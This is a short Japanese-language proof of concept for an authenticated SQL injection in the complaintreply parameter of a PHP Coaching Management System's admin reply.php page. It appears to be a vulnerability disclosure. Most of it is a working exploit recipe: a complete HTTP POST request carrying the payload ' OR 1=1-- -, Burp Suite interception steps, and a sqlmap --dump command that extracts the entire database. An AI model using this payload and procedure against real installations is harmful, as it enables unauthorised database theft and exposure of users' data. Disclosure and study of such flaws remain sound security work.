
Coaching Management Systemにおける認証済みSQLインジェクションの概念実証であり、サニタイズされていないcomplaintreplyパラメータを介したデータベースダンプを示しています。
PHP製コーチング管理システム(Coaching Management System)にSQLインジェクションの脆弱性が存在します。管理者返信機能におけるcomplaintreplyパラメータは、SQLクエリで使用される前に適切にサニタイズされていません。認証済みの攻撃者(管理者)が悪意のあるSQLクエリを注入でき、データベース全体の抽出につながります。
/cims/modules/admin/reply.phpcomplaintreplycode-projects.org
PHP製コーチング管理システム(Coaching Management System in PHP) https://code-projects.org/coaching-management-system-in-php-with-source-code/
不明(2026年4月時点の最新版でテスト済み)
学生が苦情を送信 
管理者が苦情を開き、返信機能にアクセス
POST /cims/modules/admin/reply.php?complaintid=18 HTTP/1.1 Host: 192.168.0.9 Content-Type: application/x-www-form-urlencoded
complaintreply=' OR 1=1-- -&submit=submit

Burp Suiteでリクエストを傍受 
ペイロードを注入:
'

SQLエラーを確認
7. インジェクションを確認:
' OR 1=1-- -

以下を使用してデータベースをダンプ:
sqlmap -r sqli.txt --dump

深刻度: CRITICAL